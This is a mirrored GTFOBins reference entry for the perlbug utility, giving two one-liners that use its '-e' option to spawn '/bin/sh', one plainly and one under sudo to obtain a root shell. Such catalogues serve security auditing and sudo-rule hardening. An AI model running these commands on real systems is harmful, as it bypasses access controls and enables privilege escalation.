mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
8 lines
161 B
Markdown
8 lines
161 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
|
|
sudo:
|
|
- code: sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
|
|
---
|